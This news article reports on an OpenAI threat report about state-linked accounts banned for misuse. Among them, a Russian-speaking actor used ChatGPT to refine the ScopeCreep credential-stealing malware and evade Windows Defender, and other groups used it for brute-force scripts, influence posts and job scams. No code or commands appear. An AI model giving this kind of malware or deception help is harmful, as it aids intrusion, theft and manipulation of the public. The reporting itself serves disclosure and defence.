Artificial Intelligence & Machine Learning
,
Next-Generation Technologies & Secure Development
Malicious Accounts Linked to Malware, Influence Operations

OpenAI is using its artificial intelligence models to detect and counter abuse and has banned accounts associated with malicious state-linked operations.
See Also: On Demand | Global Incident Response Report 2025
Hackers aligned with Russia, China, North Korea and Iran have used OpenAI’s tools to support malware development and social media manipulation, the company said. It also detected some activity from Cambodia and the Philippines.
Among the groups disrupted is a Russian-speaking actor who used ChatGPT to develop and refine malware dubbed ScopeCreep. OpenAI said the actor used temporary email addresses to create accounts, engaging the chatbot once per account to debug code, create HTTPS requests and modify PowerShell commands for evading Windows Defender. Researchers saw the malware, written in Go, distributed on a repository that impersonated a gaming utility software called Crosshair X.
The malicious code initiated a multi-stage process that escalated privileges, maintained stealthy persistence, and exfiltrated credentials and cookies. It also contained logic to notify the operator through a Telegram channel when new systems were compromised.
OpenAI said it had observed this threat actor using its models to assist in tasks such as integrating the Telegram API, debugging malware components and configuring command-and-control infrastructure. The malware was publicly available, but there is no indication of large-scale infections and OpenAI said it was able to intervene at what it characterized as an early stage of development.
Other banned accounts were linked to two hacking groups commonly attributed to the Chinese government and tracked as APT5 and APT15. OpenAI said that hackers used ChatGPT for open-source research and troubleshooted Linux system configurations, software development and infrastructure setup. This included building offline software packages and configuring firewalls and name servers.
The same groups explored the use of AI to automate social media influence. OpenAI found instances of ChatGPT being used to generate posts and interactions for platforms including Facebook, Instagram, TikTok and X, formerly Twitter. The accounts in some cases tasked ChatGPT for help developing scripts to brute-force FTP credentials or deploy Android apps to programmatically control social media content.
The report describes other state-linked clusters engaged in online influence or cybercrime. One operation, likely linked to North Korea, used OpenAI’s models to support fraudulent employment scams by creating convincing resumes and task documentation for IT roles. Another campaign generated multilingual social media content on geopolitically sensitive topics for distribution across major platforms.
OpenAI cited a campaign it named “Operation Uncle Spam,” in which accounts generated English, Spanish and Swahili content that appeared aimed at polarizing discourse on divisive U.S. political issues. These posts appeared on platforms like Bluesky and X, sometimes by accounts posing as Americans.
The company said it did not observe actors using ChatGPT to achieve entirely new capabilities, but that its tools were being used to improve workflow efficiency and scale messaging output. In some cases, this included translation, code debugging or scripting help for deceptive messaging campaigns.
The new report builds on prior disclosures by OpenAI, including a February update that detailed how accounts linked to Chinese and North Korean operations had used ChatGPT to support information operations and scams. The company says its approach combines detection methods, human oversight, and collaboration with peers to limit abuse (see: China Using AI-Powered Surveillance Tools, Says OpenAI).